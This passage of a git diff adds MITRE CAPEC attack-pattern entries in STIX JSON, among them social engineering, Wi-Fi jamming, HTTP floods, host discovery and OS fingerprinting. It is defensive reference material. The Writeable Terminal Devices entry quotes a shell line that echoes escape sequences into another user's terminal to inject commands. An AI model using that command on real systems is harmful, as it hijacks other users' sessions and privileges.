"CAPEC-439" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379" + }, + { + "source_name": "reference_from_CAPEC", + "description": "SAFECode, The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain, 2009, Safecode.org", + "external_id": "REF-384" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_example_instances": [ + "A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.", + "External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2fbc1e08-518a-43b5-a803-a88ff3bb2bec.json b/capec/attack-pattern/attack-pattern--2fbc1e08-518a-43b5-a803-a88ff3bb2bec.json new file mode 100644 index 0000000000..b0a13b2343 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2fbc1e08-518a-43b5-a803-a88ff3bb2bec.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--95b7163e-e3c5-4fb2-8f29-3206b01959ea", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2fbc1e08-518a-43b5-a803-a88ff3bb2bec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Information Elicitation", + "description": "An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/410.html", + "external_id": "CAPEC-410" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c.json b/capec/attack-pattern/attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c.json new file mode 100644 index 0000000000..f1f54181c8 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e46098c6-6340-43f2-acfd-de426660cfa7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Wi-Fi Jamming", + "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack \u2013 for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/604.html", + "external_id": "CAPEC-604" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the Wi-fi network to authorized users.)", + "Resource Consumption (The attacker's goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Lack of anti-jam features in 802.11", + "Lack of authentication on deauthentication/disassociation packets on 802.11-based networks" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf.json b/capec/attack-pattern/attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf.json new file mode 100644 index 0000000000..0f5fce92a5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--9560e7c6-1ca7-415a-b17f-9d8618299475", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "HTTP Flood", + "description": "An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html", + "external_id": "CAPEC-488" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155.json b/capec/attack-pattern/attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155.json new file mode 100644 index 0000000000..ca65dd1f30 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--490cf8b6-3e66-4fd9-9950-01f8620b5ba6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Pretexting", + "description": "An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary\u2019s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/407.html", + "external_id": "CAPEC-407" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Depending on the adversary's intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts.)" + ] + }, + "x_capec_example_instances": [ + "The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--309ffd52-9e61-40de-a00b-8cb336a5412b.json b/capec/attack-pattern/attack-pattern--309ffd52-9e61-40de-a00b-8cb336a5412b.json new file mode 100644 index 0000000000..9ca97011b3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--309ffd52-9e61-40de-a00b-8cb336a5412b.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--f5d31fde-f6d8-4ab9-ad44-45c0fddd9be4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--309ffd52-9e61-40de-a00b-8cb336a5412b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Host Discovery", + "description": "An adversary sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. The adversary usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as 'Ping' scanning using a sonar analogy. The goal is to send a packet through to the IP address and solicit a response from the host. As such, a 'ping' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. An attack of this nature is usually carried out with a 'ping sweep,' where a particular kind of ping is sent to a range of IP addresses.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/292.html", + "external_id": "CAPEC-292" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires logical access to the target network in order to carry out host discovery." + ], + "x_capec_resources_required": [ + "The resources required will differ based upon the type of host discovery being performed. Usually a network scanning tool or scanning script is required due to the volume of requests that must be generated." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa.json b/capec/attack-pattern/attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa.json new file mode 100644 index 0000000000..75fd9479b0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--46c510b0-3bea-4774-a56c-cb023e1542a1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WebView Exposure", + "description": "An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/503.html", + "external_id": "CAPEC-503" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf", + "external_id": "REF-430" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67.json b/capec/attack-pattern/attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67.json new file mode 100644 index 0000000000..dbb535c861 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--191e708d-bd8f-4769-b996-dd8eb26f53e5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Target Programs with Elevated Privileges", + "description": "This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/69.html", + "external_id": "CAPEC-69" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html", + "external_id": "CWE-250" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/264.html", + "external_id": "CWE-264" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted program runs with elevated OS privileges.", + "The targeted program accepts input data from the user or from another program.", + "The targeted program does not perform input validation properly.", + "The targeted program does not fail safely. For instance when a program fails it may authorize restricted access to anyone.", + "The targeted program has a vulnerability such as buffer overflow which may be exploited if a malicious user can inject unvalidated data. For instance a buffer overflow interrupts the program as it executes, and makes it run additional code supplied by the attacker. If the program under attack has elevated privileges to the OS, the attacker can elevate its privileges (such as having root level access).", + "The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.", + "This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target." + ], + "x_capec_skills_required": { + "Low": "An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.", + "Medium": "More advanced attack may require knowledge of the protocol spoken by the host service." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a.json b/capec/attack-pattern/attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a.json new file mode 100644 index 0000000000..945ad78c44 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--b5cbc2c2-6d4a-471c-9a5c-5f490f7a0387", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Existing Service", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html", + "external_id": "CAPEC-551" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--31718b7c-8726-4918-ba2b-1036158b6d40.json b/capec/attack-pattern/attack-pattern--31718b7c-8726-4918-ba2b-1036158b6d40.json new file mode 100644 index 0000000000..c40f9430e3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--31718b7c-8726-4918-ba2b-1036158b6d40.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--c806a1bd-228b-4795-a2a8-f08a8ab4ee0d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--31718b7c-8726-4918-ba2b-1036158b6d40", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Greatest Common Divisor Probe", + "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/322.html", + "external_id": "CAPEC-322" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--3243e0a8-d722-48fd-b1d3-467d2d08a251.json b/capec/attack-pattern/attack-pattern--3243e0a8-d722-48fd-b1d3-467d2d08a251.json new file mode 100644 index 0000000000..e2209b72ac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--3243e0a8-d722-48fd-b1d3-467d2d08a251.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--282e3baf-be1e-4d37-a57e-87215e325bc9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--3243e0a8-d722-48fd-b1d3-467d2d08a251", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "White Box Reverse Engineering", + "description": "An attacker discovers the structure, function, and composition of a type of computer software through white box analysis techniques. White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/167.html", + "external_id": "CAPEC-167" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "Direct access to the object or software." + ], + "x_capec_resources_required": [ + "Reverse engineering of software requires varying tools and methods that enable the decompiling of executable or other compiled objects." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a.json b/capec/attack-pattern/attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a.json new file mode 100644 index 0000000000..93e4650aa7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--b5794351-0210-4638-93e9-0084f5b5ff00", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception", + "description": "The adversary uses social engineering to exploit the target's perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/417.html", + "external_id": "CAPEC-417" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "There are no necessary resources required for this attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711.json b/capec/attack-pattern/attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711.json new file mode 100644 index 0000000000..403309b548 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--780c4cb6-e1c9-4ce1-83b9-e0e39b920f5e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Manipulating Writeable Terminal Devices", + "description": "This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/40.html", + "external_id": "CAPEC-40" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n \"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.\n \"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX\n where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [R.40.1][REF-2]\n If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals." + ], + "x_capec_resources_required": [ + "Access to a terminal on the target network" + ], + "x_capec_skills_required": { + "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa.json b/capec/attack-pattern/attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa.json new file mode 100644 index 0000000000..34bcff49ed --- /dev/null +++ b/capec/attack-pattern/attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--dc6a9a7b-8947-4bf0-87ac-a2b1ff26b82f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": 